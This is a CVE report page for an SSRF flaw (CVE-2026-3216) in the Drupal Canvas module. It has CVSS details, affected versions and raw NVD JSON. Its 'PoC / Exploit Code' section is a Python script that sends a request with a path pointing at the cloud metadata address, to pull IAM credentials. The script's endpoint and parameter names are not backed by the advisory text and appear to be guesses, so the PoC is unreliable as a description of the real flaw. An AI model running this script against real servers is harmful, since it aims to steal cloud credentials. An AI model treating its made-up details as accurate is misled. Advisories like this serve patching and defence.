Security Vulnerability Report
中文
CVE-2026-3216 CVSS 5.0 MEDIUM

CVE-2026-3216

Published: 2026-03-25 16:16:23
Last Modified: 2026-03-31 19:25:35
Source: [email protected]

Description

Server-Side Request Forgery (SSRF) vulnerability in Drupal Drupal Canvas allows Server Side Request Forgery.This issue affects Drupal Canvas: from 0.0.0 before 1.1.1.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:drupal_canvas_project:drupal_canvas:*:*:*:*:*:drupal:*:* - VULNERABLE
Drupal Canvas >= 0.0.0, < 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://example.com/drupal/canvas/endpoint" attacker_controlled_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # Payload to exploit SSRF # This payload attempts to fetch cloud metadata from the internal AWS IP payload = { "file_path": attacker_controlled_url, "action": "process_image" } try: print("[*] Sending SSRF payload to target...") response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Request successful. Checking response content...") if response.text: print("[+] Potential data leaked:") print(response.text[:500]) # Print first 500 chars else: print("[-] No content returned, port might be closed or filtered.") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[!] Error during exploitation: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3216", "sourceIdentifier": "[email protected]", "published": "2026-03-25T16:16:22.777", "lastModified": "2026-03-31T19:25:35.297", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in Drupal Drupal Canvas allows Server Side Request Forgery.This issue affects Drupal Canvas: from 0.0.0 before 1.1.1."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición del lado del servidor (SSRF) en Drupal Drupal Canvas permite la falsificación de petición del lado del servidor. Este problema afecta a Drupal Canvas: desde 0.0.0 anterior a 1.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:drupal_canvas_project:drupal_canvas:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "1.1.1", "matchCriteriaId": "46DDBEDE-7D73-4AC5-B9D4-17EA870E0591"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2026-017", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.